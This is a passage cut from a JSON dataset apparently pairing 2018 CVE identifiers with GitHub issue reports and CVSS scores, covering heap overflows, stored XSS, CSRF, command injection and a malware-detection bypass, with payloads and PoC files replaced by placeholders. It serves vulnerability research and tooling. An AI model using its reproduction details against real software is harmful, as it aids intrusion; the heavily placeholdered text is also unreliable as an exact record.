APITAG upstream. Fix: Some aspects of this issue, most importantly covering prl vzvncserver's APITAG callback, have been addressed with commit NUMBERTAG a NUMBERTAG d NUMBERTAG c NUMBERTAG a2be ERRORTAG dd4b NUMBERTAG bb NUMBERTAG b2c5 on NUMBERTAG Related: FILETAG URLTAG cut",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-7251",
        "Issue_Url_old": "https://github.com/anchorcms/anchor-cms/issues/1247",
        "Issue_Url_new": "https://github.com/anchorcms/anchor-cms/issues/1247",
        "Repo_new": "anchorcms/anchor-cms",
        "Issue_Created_At": "2018-02-19T11:21:20Z",
        "description": "Vulnerability . Hey, I just noted that in anchor CMS error logs in APITAG in many a blogs and sites using Anchor are public which may have a high potential impact revealing server paths and other details . The most severe being that of revealing database username and password as in PATHTAG I will be filing a CVE based on this heuristic research that reveals it has a serious vulnerability. Looking forward to your views on the same .. Regards, APITAG Researcher",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-7253",
        "Issue_Url_old": "https://github.com/dbry/WavPack/issues/28",
        "Issue_Url_new": "https://github.com/dbry/wavpack/issues/28",
        "Repo_new": "dbry/wavpack",
        "Issue_Created_At": "2018-02-04T21:02:20Z",
        "description": "heap buffer overflow while running wavpack. We got another one ( CVETAG heap buffer overflow running wavpack with \" y APITAG option Running 'wavpack y APITAG with the attached file raises heap buffer overflow which may allow a remote attacker to cause unspecified impact including denial of service attack I expected the program to terminate without segfault, but the program crashes as follow ERRORTAG This bug was found with a fuzzer developed by APITAG group at KAIST poc.wav is available at CVETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-7254",
        "Issue_Url_old": "https://github.com/dbry/WavPack/issues/26",
        "Issue_Url_new": "https://github.com/dbry/wavpack/issues/26",
        "Repo_new": "dbry/wavpack",
        "Issue_Created_At": "2018-02-03T12:55:58Z",
        "description": "Global buffer overflow while running wavpack. Forwarding a bug report we received in the Debian Bug Tracker ( CVETAG global buffer overflow running wavpack with \" y APITAG option Running 'wavpack y APITAG with the attached file raises global buffer overflow which may allow a remote attacker to cause unspecified impact including denial of service attack I expected the program to terminate without segfault, but the program crashes as follow ERRORTAG poc.wav can be downloaded from CVETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-7265",
        "Issue_Url_old": "https://github.com/shish/shimmie2/issues/631",
        "Issue_Url_new": "https://github.com/shish/shimmie2/issues/631",
        "Repo_new": "shish/shimmie2",
        "Issue_Created_At": "2018-02-20T16:33:45Z",
        "description": "Stored XSS vulnerability resulting from improper handling of uploaded SVG files. During testing of your project, I came across a stored XSS vulnerability that stems from lack of sanitizing and checking integrity of SVG files being uploaded to the server Reproduction is quite easy as all it requires is going to the image upload feature, then selecting our crafted svg file then visiting the full image to receive the alert. Svg file code: APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7274",
        "Issue_Url_old": "https://github.com/YABhq/Quarx/issues/116",
        "Issue_Url_new": "https://github.com/grafiteinc/cms/issues/116",
        "Repo_new": "grafiteinc/cms",
        "Issue_Created_At": "2018-02-16T10:32:37Z",
        "description": "Multiple Persistent Cross Site Scripting Vulnerabilities. This is with reference to issue NUMBERTAG Description: Quarx CMS is prone to multiple persistent cross site scripting vulnerabilities because it fails to sanitize user supplied input. Affected pages and parameters: Blog > APITAG FAQ > APITAG Pages > APITAG Widgets > APITAG Menus > APITAG Impact: Attacker can execute arbitrary code in the browser of a random user. Affected version NUMBERTAG latest version) and prior PATHTAG Credit: Preethi Koroth Thanks.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7289",
        "Issue_Url_old": "https://github.com/armadito/armadito-windows-driver/issues/5",
        "Issue_Url_new": "https://github.com/armadito/armadito-windows-driver/issues/5",
        "Repo_new": "armadito/armadito-windows-driver",
        "Issue_Created_At": "2018-02-19T21:19:44Z",
        "description": "Malware with pure UTF NUMBERTAG characters in the filename can bypass detection. Files with names containing pure UTF NUMBERTAG characters can bypass detection. The user mode service will fail to open the file for scanning after the conversion is done to ANSI, because characters that cannot be converted from Unicode are replaced with '?'. URLTAG Below is an image demonstrating the bug. In the first case, the filename is in Arabic and in the second, the filename's first letter is the greek M (U NUMBERTAG C). FILETAG A fix would require a re implementation of the parts of the service dealing with filenames to make them support Unicode.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
        "severity": "LOW",
        "baseScore": 3.3,
        "impactScore": 1.4,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-7308",
        "Issue_Url_old": "https://github.com/DanWin/hosting/issues/18",
        "Issue_Url_new": "https://github.com/danwin/hosting/issues/18",
        "Repo_new": "danwin/hosting",
        "Issue_Created_At": "2018-02-21T08:32:37Z",
        "description": "CSRF vulnerability in web based Interface. Hey, Just letting you know that this has site wide no CSRF protection . For example on this endpoint FILETAG ,no CSRF tokens are verified when a user does an action",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7408",
        "Issue_Url_old": "https://github.com/npm/npm/issues/19883",
        "Issue_Url_new": "https://github.com/npm/npm/issues/19883",
        "Repo_new": "npm/npm",
        "Issue_Created_At": "2018-02-22T03:41:27Z",
        "description": "Critical Linux filesystem permissions are being changed by latest version. I'm opening this issue because: [ ] npm is crashing. [ ] npm is producing an incorrect install. [X] npm is doing something I don't understand. [X] Other (_see below for feature requests_): What's going wrong? This issue has been happening ever since NUMBERTAG was released a few hours ago. It seems to have completely broken my filesystem permissions and caused me to have to manually fix the permissions of critical files and folders. I believe that it is related to the commit NUMBERTAG e1 which is running chown on the wrong files and folders, sometimes being critical filesystem ones. By using sudo npm on a non root user (root users do not have the same effect), filesystem permissions are being modified. For example, if I run APITAG or APITAG , all commands cause my filesystem to change ownership of directories such as APITAG , APITAG , APITAG , and other critical directories needed for running the system. How can the CLI team reproduce the problem? I am personally using Arch Linux with the latest npm package, installed as root user via: APITAG APITAG APITAG Ensure that your npm is on version NUMBERTAG then, as a non root user, with sudo : APITAG You will find that it fails, sometimes with no warnings and sometimes with an EACCES as it is unable to chown the files in APITAG . No key log files are generated on my system. This was _not_ occurring on my system before the most recent update and using NUMBERTAG resolves the issue so it must be a recent commit. supporting information: APITAG prints NUMBERTAG APITAG prints NUMBERTAG npm config get registry prints: FILETAG Windows, OS APITAG or Linux?: Arch Linux Network issues: Geographic location where npm was run: UK [ ] I use a proxy to connect to the npm registry. [ ] I use a proxy to connect to the web. [ ] I use a proxy when downloading Git repos. [ ] I access the npm registry via a VPN [ ] I don't use a proxy, but have limited or unreliable internet access. Container: [ ] I develop using Vagrant on Windows. [ ] I develop using Vagrant on OS X or Linux. [ ] I develop / deploy using Docker. [ ] I deploy to a APITAG APITAG Heroku). APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-7440",
        "Issue_Url_old": "https://github.com/DanBloomberg/leptonica/issues/303",
        "Issue_Url_new": "https://github.com/danbloomberg/leptonica/issues/303",
        "Repo_new": "danbloomberg/leptonica",
        "Issue_Created_At": "2018-02-06T08:09:04Z",
        "description": "APITAG Command Injection Vulnerability. An exploitable command injection vulnerability exists in the APITAG of Leptonica NUMBERTAG A specially crafted gplot rootname argument can cause a command injection resulting in arbitrary code execution. An attacker can provide a malicious path as input to an application that passes attacker data to this function to trigger this vulnerability. For details refer to NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-7443",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/999",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/999",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-02-23T07:40:53Z",
        "description": "Dos: (failed to allocate). Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): tiff Trigger Command: convert ../test.tif /dev/null ASAN OUTPUT PATHTAG convert ../test.tif /dev/null NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG f NUMBERTAG f NUMBERTAG bytes of APITAG (errno NUMBERTAG APITAG memory map follows NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG a NUMBERTAG a NUMBERTAG a NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG c NUMBERTAG c NUMBERTAG c NUMBERTAG e NUMBERTAG e NUMBERTAG e NUMBERTAG e NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG a NUMBERTAG a NUMBERTAG a NUMBERTAG a NUMBERTAG d NUMBERTAG d NUMBERTAG d NUMBERTAG d NUMBERTAG d NUMBERTAG d NUMBERTAG d NUMBERTAG d NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f5db NUMBERTAG cb NUMBERTAG f5db4b NUMBERTAG f5db4b NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG f5db7bd NUMBERTAG f5db7bd NUMBERTAG f5db7bf NUMBERTAG PATHTAG NUMBERTAG f5db7bf NUMBERTAG f5db7df NUMBERTAG PATHTAG NUMBERTAG f5db7df NUMBERTAG f5db7df NUMBERTAG PATHTAG NUMBERTAG f5db7df NUMBERTAG f5db7df NUMBERTAG PATHTAG NUMBERTAG f5db7df NUMBERTAG f5db7e NUMBERTAG PATHTAG NUMBERTAG f5db7e NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG a NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG c NUMBERTAG f5db NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG b NUMBERTAG f5db NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG c NUMBERTAG f5db NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG d NUMBERTAG f5db NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG d NUMBERTAG f5db8b3c NUMBERTAG PATHTAG NUMBERTAG f5db8b3c NUMBERTAG f5db8b NUMBERTAG PATHTAG NUMBERTAG f5db8b NUMBERTAG f5db8b NUMBERTAG PATHTAG NUMBERTAG f5db8b NUMBERTAG f5db8b NUMBERTAG f5db8b NUMBERTAG f5db8b5e NUMBERTAG PATHTAG NUMBERTAG f5db8b5e NUMBERTAG f5db8d5d NUMBERTAG PATHTAG NUMBERTAG f5db8d5d NUMBERTAG f5db8d5e NUMBERTAG PATHTAG NUMBERTAG f5db8d5e NUMBERTAG f5db8d5f NUMBERTAG PATHTAG NUMBERTAG f5db8d5f NUMBERTAG f5db8d NUMBERTAG f5db8d NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db NUMBERTAG PATHTAG NUMBERTAG f5db NUMBERTAG f5db9be NUMBERTAG PATHTAG NUMBERTAG f5db9be NUMBERTAG f5db9de NUMBERTAG PATHTAG NUMBERTAG f5db9de NUMBERTAG f5db9e NUMBERTAG PATHTAG NUMBERTAG f5db9e NUMBERTAG f5db9f6f NUMBERTAG PATHTAG NUMBERTAG f5db9f6f NUMBERTAG f5db9f NUMBERTAG f5db9f NUMBERTAG f5dba NUMBERTAG PATHTAG NUMBERTAG f5dba NUMBERTAG f5dba NUMBERTAG PATHTAG NUMBERTAG f5dba NUMBERTAG f5dba NUMBERTAG PATHTAG NUMBERTAG f5dba NUMBERTAG f5dba NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG f5dba NUMBERTAG a NUMBERTAG f5dbaedf NUMBERTAG f5dbaedf NUMBERTAG f5dbaf NUMBERTAG PATHTAG NUMBERTAG f5dbb NUMBERTAG f5dbb0ed NUMBERTAG f5dbb0ed NUMBERTAG f5dbb NUMBERTAG f5dbb NUMBERTAG f5dbb NUMBERTAG PATHTAG NUMBERTAG f5dbb NUMBERTAG f5dbb NUMBERTAG PATHTAG NUMBERTAG f5dbb NUMBERTAG f5dbb NUMBERTAG fff NUMBERTAG d NUMBERTAG fff NUMBERTAG fa NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7447",
        "Issue_Url_old": "https://github.com/i7MEDIA/mojoportal/issues/82",
        "Issue_Url_new": "https://github.com/i7media/mojoportal/issues/82",
        "Repo_new": "i7media/mojoportal",
        "Issue_Created_At": "2018-02-22T14:46:16Z",
        "description": "Multiple Persistent Cross Site Scripting Vulnerabilities . Description: mojoportal is prone to multiple persistent cross site scripting vulnerabilities because it fails to sanitize user supplied input. The APITAG and APITAG fields of APITAG page are vulnerable. Impact: Attacker can execute arbitrary code in the browser of a random user. Affected version: all PATHTAG Credit: Preethi Koroth Thanks.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-7470",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/998",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/998",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-02-23T05:36:01Z",
        "description": "Wrong pointer access. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Modules APITAG Delegates (built in): bzlib cairo djvu fftw flif fontconfig fpx freetype jbig jng jp2 jpeg lcms ltdl openexr pangocairo png raw rsvg tiff webp wmf x xml zlib ASAN OUTPUT APITAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): ubuntu NUMBERTAG server i NUMBERTAG Additional information: Found by: Wang Yan APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7487",
        "Issue_Url_old": "https://github.com/pts/sam2p/issues/18",
        "Issue_Url_new": "https://github.com/pts/sam2p/issues/18",
        "Repo_new": "pts/sam2p",
        "Issue_Created_At": "2018-02-12T09:27:09Z",
        "description": "It is a heap buffer overflow in APITAG APITAG Hi, i found a heap buffer overflow bug in the sam2p NUMBERTAG the details are below(ASAN): > ./sam2p NUMBERTAG APITAG heapover EPS: /dev/null > This is sam2p NUMBERTAG Available Loaders: PS PDF JAI PNG JPEG TIFF PNM BMP GIF LBM XPM PCX TGA. > Available Appliers: XWD Meta Empty BMP PNG TIFF6 TIFF6 JAI JPEG JAI JPEG PNM GIF NUMBERTAG a+LZW XPM PSL1C PSL NUMBERTAG PDF PSL2+PDF JAI P APITAG > sam2p: Warning: PCX: PCX file appears to be truncated. > sam2p: Warning: PCX: Error reading PCX colormap. Using grayscale NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG ae9e at pc NUMBERTAG f6 bp NUMBERTAG fffffffd6d0 sp NUMBERTAG fffffffd6c0 > WRITE of size NUMBERTAG at NUMBERTAG b NUMBERTAG ae9e thread T NUMBERTAG f5 in APITAG PATHTAG NUMBERTAG f5 in in_pcx_reader PATHTAG NUMBERTAG in APITAG , APITAG const&, char const ) PATHTAG NUMBERTAG a in APITAG Files::FILEW&, char const const , bool) PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG ffff6ac NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG NUMBERTAG b NUMBERTAG ae9e is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG > allocated by thread T0 here NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG df2a in emulate_cc_new PATHTAG NUMBERTAG df2a in operator APITAG long) PATHTAG > > SUMMARY: APITAG heap buffer overflow PATHTAG APITAG > Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e NUMBERTAG fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa > Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): > Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa > Heap right redzone: fb > Freed heap region: fd > Stack left redzone: f1 > Stack mid redzone: f2 > Stack right redzone: f3 > Stack partial redzone: f4 > Stack after return: f5 > Stack use after scope: f8 > Global redzone: f9 > Global init order: f6 > Poisoned by user: f7 > Container overflow: fc > Array cookie: ac > Intra object redzone: bb > APITAG internal: fe NUMBERTAG ABORTING POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-7489",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1931",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1931",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2018-02-11T02:03:28Z",
        "description": "Two c3p0 gadgets to exploit default typing issue. (note: placeholder until versions are released) From an email report there are NUMBERTAG other c3p0 classes (above and beyond ones listed in NUMBERTAG need to be blocked.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-7551",
        "Issue_Url_old": "https://github.com/pts/sam2p/issues/28",
        "Issue_Url_new": "https://github.com/pts/sam2p/issues/28",
        "Repo_new": "pts/sam2p",
        "Issue_Created_At": "2018-02-23T02:39:01Z",
        "description": "invalid free in APITAG (in APITAG There is an invalid free in APITAG that leads to a Segmentation fault at sam2p NUMBERTAG A crafted input will lead to denial of service attack. Steps to Reproduce: ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-7552",
        "Issue_Url_old": "https://github.com/pts/sam2p/issues/30",
        "Issue_Url_new": "https://github.com/pts/sam2p/issues/30",
        "Repo_new": "pts/sam2p",
        "Issue_Created_At": "2018-02-23T02:47:45Z",
        "description": "invalid free in APITAG (in APITAG There is an invalid free in APITAG that leads to a Segmentation fault at sam2p NUMBERTAG A crafted input will lead to denial of service attack. Steps to Reproduce: ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-7553",
        "Issue_Url_old": "https://github.com/pts/sam2p/issues/32",
        "Issue_Url_new": "https://github.com/pts/sam2p/issues/32",
        "Repo_new": "pts/sam2p",
        "Issue_Created_At": "2018-02-23T07:22:41Z",
        "description": "It is a heap buffer overflow vulnerability in APITAG APITAG . Hi, i found a heap buffer overflow vulnerability in the sam2p NUMBERTAG reason: URLTAG URLTAG The crash happened in the APITAG function of the file in_pcx.cpp in line NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-7554",
        "Issue_Url_old": "https://github.com/pts/sam2p/issues/29",
        "Issue_Url_new": "https://github.com/pts/sam2p/issues/29",
        "Repo_new": "pts/sam2p",
        "Issue_Created_At": "2018-02-23T02:44:40Z",
        "description": "invalid free in APITAG (in input APITAG There is an invalid free in APITAG that leads to a Segmentation fault at sam2p NUMBERTAG A crafted input will lead to denial of service attack. Steps to Reproduce: ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-7588",
        "Issue_Url_old": "https://github.com/dtschump/CImg/issues/183",
        "Issue_Url_new": "https://github.com/greyclab/cimg/issues/183",
        "Repo_new": "greyclab/cimg",
        "Issue_Created_At": "2018-03-01T04:17:41Z",
        "description": "a heap overflow when load a bmp image. a heap overflow occurs when load a crafted bmp image using cimg. the bug report as following with address sanitizer: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f NUMBERTAG ff NUMBERTAG at pc NUMBERTAG dd NUMBERTAG bp NUMBERTAG ffee7a8e NUMBERTAG sp NUMBERTAG ffee7a8e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f NUMBERTAG ff NUMBERTAG thread T NUMBERTAG dd NUMBERTAG in APITAG char>::_load_bmp(_IO_FILE , char const ) APITAG NUMBERTAG b NUMBERTAG a4 in APITAG char>::load_bmp(char const ) APITAG NUMBERTAG b NUMBERTAG a4 in APITAG char>::load(char const ) APITAG NUMBERTAG fa in APITAG char>::assign(char const ) APITAG NUMBERTAG fa in APITAG APITAG const ) APITAG NUMBERTAG fa in main PATHTAG NUMBERTAG f NUMBERTAG bb8f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG ca NUMBERTAG b2 in operator APITAG long) ( PATHTAG NUMBERTAG fb6 in APITAG char>::assign(unsigned int, unsigned int, unsigned int, unsigned int) APITAG NUMBERTAG a NUMBERTAG d in APITAG char>::assign(unsigned int, unsigned int, unsigned int, unsigned int, unsigned char const&) APITAG NUMBERTAG a NUMBERTAG d in APITAG char>::_load_bmp(_IO_FILE , char const ) APITAG NUMBERTAG b NUMBERTAG a4 in APITAG char>::load_bmp(char const ) APITAG NUMBERTAG b NUMBERTAG a4 in APITAG char>::load(char const ) APITAG NUMBERTAG fa in APITAG char>::assign(char const ) APITAG NUMBERTAG fa in APITAG APITAG const ) APITAG NUMBERTAG fa in main PATHTAG SUMMARY: APITAG heap buffer overflow APITAG APITAG char>::_load_bmp(_IO_FILE , char const ) Shadow bytes around the buggy address NUMBERTAG ff2af NUMBERTAG eb NUMBERTAG ff2af NUMBERTAG ec NUMBERTAG ff2af NUMBERTAG ed NUMBERTAG ff2af NUMBERTAG ee NUMBERTAG ff2af NUMBERTAG ef NUMBERTAG ff2af NUMBERTAG f NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ff2af NUMBERTAG f NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ff2af NUMBERTAG f NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ff2af NUMBERTAG f NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ff2af NUMBERTAG f NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ff2af NUMBERTAG f NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING the testcase please refer: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-7589",
        "Issue_Url_old": "https://github.com/dtschump/CImg/issues/184",
        "Issue_Url_new": "https://github.com/greyclab/cimg/issues/184",
        "Repo_new": "greyclab/cimg",
        "Issue_Created_At": "2018-03-01T04:25:13Z",
